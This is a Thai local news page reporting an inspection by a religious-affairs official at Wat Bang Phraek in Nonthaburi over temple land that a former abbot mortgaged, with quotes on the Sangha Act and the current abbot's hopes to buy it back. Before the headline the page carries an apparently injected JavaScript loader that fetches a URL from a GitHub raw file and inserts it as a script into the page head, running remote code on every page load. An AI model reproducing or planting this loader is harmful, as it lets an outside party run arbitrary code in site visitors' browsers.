;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); นนทบุรี รองผอ.สำนักพุทธฯลงพื้นที่วัดบางแพรกตรวจสอบอดีตเจ้าอาวาสได้นำที่ดินไปจำนอง ตอนนี้ก็กำลังรอเอกสารว่าเป็นที่ของวัดหรือที่ส่วนตัว - ThaiReference | อาสาไทยยืนยัน
นนทบุรี  รองผอ.สำนักพุทธฯลงพื้นที่วัดบางแพรกตรวจสอบอดีตเจ้าอาวาสได้นำที่ดินไปจำนอง ตอนนี้ก็กำลังรอเอกสารว่าเป็นที่ของวัดหรือที่ส่วนตัว

ที่วัดบางแพรก ต.บางรักใหญ่ อ.บางบัวทอง จ.นนทบุรี ลงพื้นที่ตรวจสอบเกี่ยวกับที่ดินวัดหลุดจำนอง นาย วุฒิวิวัฒน์ ศุภนิมิตวงศ์ นักวิชาการศาสนาชำนาญการพิเศษ กล่าวว่า เบื้องต้นได้มาขอข้อมูลเอกสารความเป็นมา กับทางเจ้าอาวาสองค์ปัจจุบัน เนื่องจากว่าอดีตเจ้าอาวาสได้นำที่ดินไปจำนอง ตอนนี้ก็กำลังรอเอกสารว่าเป็นที่ของวัดหรือที่ส่วนตัว ในการที่เอาเงินไปซื้อที่ดินตรงนี้เป็นเงินวัดหรือเงินสวนตัว ตอนนี้ก็ขอหาข้อมูลที่แน่ชัดก่อน ถ้าข่าวออกไปจะทำให้ชาวบ้านเข้าใจผิด เพราะปกติที่ของวัด ตามพระราชบัญญัติคณะสงฆ์ มาตรา34 การโอนกรรมสิทธิ์ ที่สงฆ์ ต้องกระทำด้วยพระราชบัญญัติ ไม่สามารถโอนด้วยได้ตามวิธีปกติ และมาตรา 35 กล่าวด้วยว่าที่ของสงฆ์จะไม่ตกไปอยู่ในการบังคับคดี

พระมหาณัฐวุฒิ กลฺยาณเมธีเจ้าอาวาสวัดบางแพรก กล่าวว่า ยังซื้อคืนไม่ได้ หากเขาขายในราคาที่เป็นธรรม หรือราคาที่ทางอาจารย์ได้ขายไป ก็จะซื้อคืนแต่นี้ราคามันสูงเกิน ก็เคยได้คุยกับโยมเจ้าของที่คนปัจจุบันเมื่อหลายปีมาแล้ว เขาก็บอกว่ายังไงก็ลดไม่ได้ มันเป็นเรื่องของธุรกิจ อาตมาก็อยากได้ที่ดินคืนมาก เพราะมันสามารถจะทำประโยชน์ต่อไปได้ ซึ่งราคามันสูงไม่รู้จะหาเงินจากไหนมาซื้อ หากถามว่าจะซื้อไหม ซื้อแน่นอน แต่ขอบูรณะวัดก่อน  เพราะทุกวันนี้วัดของเราก็เป็นวัดเล็กๆไม่ค่อยมีใครมาทำบุญเท่าที่ควร ซึ่งที่ตรงนี้เป็นที่ตาบอดไม่สามารถเข้าทางไหนได้ และในอนาคตข้างหน้าวัดก็จะทำกำแพงล้อมวัด และเจ้าของที่ดินคงเข้าที่ดินของเขาไม่ได้ โดยทางเจ้าอาวาสองค์ก่นก็ได้ส่งเอกสารไปทางสำนักพุทธแล้วว่า อยู่ในช่วงเจราจาต่อลอง แต่ทางนายทุนยังไม่ให้ราคา และไม่สามารถที่จะซื้อคืนได้  เอกสารเกี่ยวกับที่ดินอาตมาไม่มี จะมีที่นายทุน และสำนักพุทธ อาตมาก็ไม่ทราบว่าเป็นเงินอดีตเข้าอาวาสเท่าไหร่ หรือใครเท่าไหร่ในการซื้อ แต่อาตมาทราบว่า ท่านไปเอาเงินตรงนั้นมาเพื่อบริหารวัด

https://www.tiktok.com/@chaijexu/video/7527893890536426770?is_from_webapp=1&sender_device=pc&web_id=7463396454826018305

ภาพ/ข่าว ฉัตรมงคล สิงห์โต ผู้สื่อข่าว จ.นนทบุรี